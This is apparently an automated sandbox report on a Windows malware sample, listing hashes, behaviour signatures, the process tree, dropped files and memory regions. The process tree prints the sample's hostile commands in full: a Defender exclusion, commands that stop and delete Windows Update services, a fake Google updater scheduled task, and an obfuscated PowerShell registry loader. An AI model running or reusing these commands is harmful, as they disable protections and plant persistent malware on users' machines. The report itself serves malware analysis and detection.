Analysis
-
max time kernel
17s -
max time network
78s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
13-07-2023 09:43
General
-
Target
dmi1dfg7n.exe
-
Size
2.8MB
-
MD5
9253ed091d81e076a3037e12af3dc871
-
SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981
-
SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
-
SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
SSDEEP
49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Stops running service(s) 3 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 41 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7378ddb2-b839-4b3a-b0fb-224306b4eec3}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 64 -ip 641⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 64 -s 31001⤵
- Program crash
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 840 -s 5562⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 840 -ip 8401⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{7c72ede5-15cf-41dc-bccc-52faabd1a4e2}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD50e3b2fb1305afa355fb0585c068cdbbd
SHA1b4e9457bfdc38337f64e3b2606aa34861aa6b4ed
SHA25643a303fed06d5928800280cb0bf716790d9f886c87f26faf9fbdfa59b55e9c0d
SHA5126a754dbb33c549ace5f71e169511422284f688c9df1c1e5fac8a633feac24312ba39fa4c682bdc9fe1d1162e2a3bd6190013652e567909417579db4b8791554d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5c55932eafeb31099c6f64eae00152896
SHA1fecb0722357a0013f8e9197a15c625c6f86107fb
SHA25648e1311d1f976111c68d7670ce90b9274dc7f0004b1a86299ce96d8bfe64502d
SHA5120cd32f545f4a64df7f38e687455f5811093710f14ce2c6a03fe6df889a88418283eb698dcf0ea902f0d32238e0d4cc81430b5c9b4a7f28e430e0450cab56575d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD502f4d5eceb808b662dc010b46f16cd65
SHA16ea36b74a71f8c4af37691d405c8149db6c88700
SHA256f1016f26c71f59d0cc33f1474d5d7f10bcf110d8dffb4cf60d2babea71239bd4
SHA51225c3202b9d55f96127bb7b090909bcae022a06db780673add777ba669a851907040892e77a93a3f00d5d37261b3a7d8aa879a7fe7e199ed0be89cf2639c51c1b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khswj22k.bk2.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/64-255-0x000002924A920000-0x000002924A94A000-memory.dmpFilesize
168KB
-
memory/64-301-0x000002924A920000-0x000002924A94A000-memory.dmpFilesize
168KB
-
memory/64-267-0x000002924A920000-0x000002924A94A000-memory.dmpFilesize
168KB
-
memory/64-268-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/520-264-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/520-269-0x0000020637A90000-0x0000020637ABA000-memory.dmpFilesize
168KB
-
memory/520-262-0x0000020637A90000-0x0000020637ABA000-memory.dmpFilesize
168KB
-
memory/620-261-0x00007FFD197EC000-0x00007FFD197ED000-memory.dmpFilesize
4KB
-
memory/620-259-0x00007FFD197EF000-0x00007FFD197F0000-memory.dmpFilesize
4KB
-
memory/620-244-0x00000122CE400000-0x00000122CE42A000-memory.dmpFilesize
168KB
-
memory/620-241-0x00000122CE3D0000-0x00000122CE3F3000-memory.dmpFilesize
140KB
-
memory/620-245-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/620-298-0x00000122CE400000-0x00000122CE42A000-memory.dmpFilesize
168KB
-
memory/620-247-0x00007FFD197ED000-0x00007FFD197EE000-memory.dmpFilesize
4KB
-
memory/664-273-0x000001E3AA5A0000-0x000001E3AA5CA000-memory.dmpFilesize
168KB
-
memory/664-274-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/664-307-0x000001E3AA5A0000-0x000001E3AA5CA000-memory.dmpFilesize
168KB
-
memory/676-263-0x00000269781C0000-0x00000269781EA000-memory.dmpFilesize
168KB
-
memory/676-250-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/676-246-0x00000269781C0000-0x00000269781EA000-memory.dmpFilesize
168KB
-
memory/840-339-0x00000154CAB40000-0x00000154CAB6A000-memory.dmpFilesize
168KB
-
memory/840-343-0x00007FFD19750000-0x00007FFD19945000-memory.dmpFilesize
2.0MB
-
memory/960-265-0x000001EE13BA0000-0x000001EE13BCA000-memory.dmpFilesize
168KB
-
memory/960-254-0x000001EE13BA0000-0x000001EE13BCA000-memory.dmpFilesize
168KB
-
memory/960-258-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/1032-210-0x000001CECFCC0000-0x000001CECFCD0000-memory.dmpFilesize
64KB
-
memory/1032-227-0x00007FFD19750000-0x00007FFD19945000-memory.dmpFilesize
2.0MB
-
memory/1032-228-0x00007FFD18A10000-0x00007FFD18ACE000-memory.dmpFilesize
760KB
-
memory/1032-209-0x00007FFCFAA30000-0x00007FFCFB4F1000-memory.dmpFilesize
10.8MB
-
memory/1032-237-0x00007FFCFAA30000-0x00007FFCFB4F1000-memory.dmpFilesize
10.8MB
-
memory/1080-278-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/1080-281-0x0000027427C90000-0x0000027427CBA000-memory.dmpFilesize
168KB
-
memory/1080-275-0x0000027427C90000-0x0000027427CBA000-memory.dmpFilesize
168KB
-
memory/1088-288-0x0000027DD7980000-0x0000027DD79AA000-memory.dmpFilesize
168KB
-
memory/1088-284-0x0000027DD7980000-0x0000027DD79AA000-memory.dmpFilesize
168KB
-
memory/1088-287-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/1088-325-0x0000027DD7980000-0x0000027DD79AA000-memory.dmpFilesize
168KB
-
memory/1096-357-0x00000298BCC90000-0x00000298BCCBA000-memory.dmpFilesize
168KB
-
memory/1096-291-0x00000298BCC90000-0x00000298BCCBA000-memory.dmpFilesize
168KB
-
memory/1096-289-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/1096-286-0x00000298BCC90000-0x00000298BCCBA000-memory.dmpFilesize
168KB
-
memory/1192-297-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/1192-296-0x0000021F99130000-0x0000021F9915A000-memory.dmpFilesize
168KB
-
memory/1240-311-0x00007FFCD97D0000-0x00007FFCD97E0000-memory.dmpFilesize
64KB
-
memory/1240-306-0x000001E24E8E0000-0x000001E24E90A000-memory.dmpFilesize
168KB
-
memory/1252-313-0x0000025B6D2C0000-0x0000025B6D2EA000-memory.dmpFilesize
168KB
-
memory/1328-329-0x0000018C1CE30000-0x0000018C1CE5A000-memory.dmpFilesize
168KB
-
memory/1408-335-0x000001B1B0CC0000-0x000001B1B0CEA000-memory.dmpFilesize
168KB
-
memory/1452-347-0x0000029037F80000-0x0000029037FAA000-memory.dmpFilesize
168KB
-
memory/1460-351-0x000001A7BF7D0000-0x000001A7BF7FA000-memory.dmpFilesize
168KB
-
memory/1504-358-0x000001A92A260000-0x000001A92A28A000-memory.dmpFilesize
168KB
-
memory/1596-356-0x0000021B182D0000-0x0000021B182FA000-memory.dmpFilesize
168KB
-
memory/1644-359-0x0000020EFC330000-0x0000020EFC35A000-memory.dmpFilesize
168KB
-
memory/2492-146-0x0000018EBB710000-0x0000018EBB720000-memory.dmpFilesize
64KB
-
memory/2492-145-0x0000018EBB710000-0x0000018EBB720000-memory.dmpFilesize
64KB
-
memory/2492-147-0x0000018EBB710000-0x0000018EBB720000-memory.dmpFilesize
64KB
-
memory/2492-144-0x00007FFCFA6E0000-0x00007FFCFB1A1000-memory.dmpFilesize
10.8MB
-
memory/2492-150-0x00007FFCFA6E0000-0x00007FFCFB1A1000-memory.dmpFilesize
10.8MB
-
memory/2492-143-0x0000018ED3E40000-0x0000018ED3E62000-memory.dmpFilesize
136KB
-
memory/2792-170-0x00007FF6718A0000-0x00007FF671B68000-memory.dmpFilesize
2.8MB
-
memory/2792-133-0x00007FF6718A0000-0x00007FF671B68000-memory.dmpFilesize
2.8MB
-
memory/2800-320-0x0000000005500000-0x000000000551A000-memory.dmpFilesize
104KB
-
memory/2800-293-0x0000000003D00000-0x0000000003D10000-memory.dmpFilesize
64KB
-
memory/2800-277-0x0000000074A70000-0x0000000075220000-memory.dmpFilesize
7.7MB
-
memory/2800-354-0x00000000055B0000-0x00000000055D2000-memory.dmpFilesize
136KB
-
memory/2800-221-0x00000000049A0000-0x00000000049C2000-memory.dmpFilesize
136KB
-
memory/2800-213-0x0000000004340000-0x0000000004968000-memory.dmpFilesize
6.2MB
-
memory/2800-315-0x0000000006720000-0x0000000006D9A000-memory.dmpFilesize
6.5MB
-
memory/2800-198-0x0000000074A70000-0x0000000075220000-memory.dmpFilesize
7.7MB
-
memory/2800-199-0x00000000016E0000-0x0000000001716000-memory.dmpFilesize
216KB
-
memory/2800-279-0x0000000003D00000-0x0000000003D10000-memory.dmpFilesize
64KB
-
memory/2800-212-0x0000000003D00000-0x0000000003D10000-memory.dmpFilesize
64KB
-
memory/2800-285-0x0000000003D00000-0x0000000003D10000-memory.dmpFilesize
64KB
-
memory/2800-346-0x00000000060A0000-0x0000000006136000-memory.dmpFilesize
600KB
-
memory/2800-211-0x0000000003D00000-0x0000000003D10000-memory.dmpFilesize
64KB
-
memory/2800-226-0x0000000004FF0000-0x000000000500E000-memory.dmpFilesize
120KB
-
memory/2800-225-0x0000000004AB0000-0x0000000004B16000-memory.dmpFilesize
408KB
-
memory/2800-224-0x0000000004A40000-0x0000000004AA6000-memory.dmpFilesize
408KB
-
memory/2892-235-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2892-230-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2892-229-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2892-231-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2892-234-0x00007FFD19750000-0x00007FFD19945000-memory.dmpFilesize
2.0MB
-
memory/2892-238-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2892-236-0x00007FFD18A10000-0x00007FFD18ACE000-memory.dmpFilesize
760KB
-
memory/2896-177-0x000001AB3F660000-0x000001AB3F670000-memory.dmpFilesize
64KB
-
memory/2896-172-0x00007FFCFAA30000-0x00007FFCFB4F1000-memory.dmpFilesize
10.8MB
-
memory/2896-193-0x000001AB3F660000-0x000001AB3F670000-memory.dmpFilesize
64KB
-
memory/2896-196-0x00007FFCFAA30000-0x00007FFCFB4F1000-memory.dmpFilesize
10.8MB
-
memory/3936-252-0x00007FF683A10000-0x00007FF683CD8000-memory.dmpFilesize
2.8MB
-
memory/4716-194-0x00007FF76F150000-0x00007FF76F1A6000-memory.dmpFilesize
344KB
-
memory/4876-167-0x00007FFCFA6E0000-0x00007FFCFB1A1000-memory.dmpFilesize
10.8MB
-
memory/4876-152-0x00007FFCFA6E0000-0x00007FFCFB1A1000-memory.dmpFilesize
10.8MB
-
memory/4876-162-0x0000023941650000-0x0000023941660000-memory.dmpFilesize
64KB
-
memory/4876-163-0x0000023941650000-0x0000023941660000-memory.dmpFilesize
64KB
-
memory/4876-165-0x0000023941650000-0x0000023941660000-memory.dmpFilesize
64KB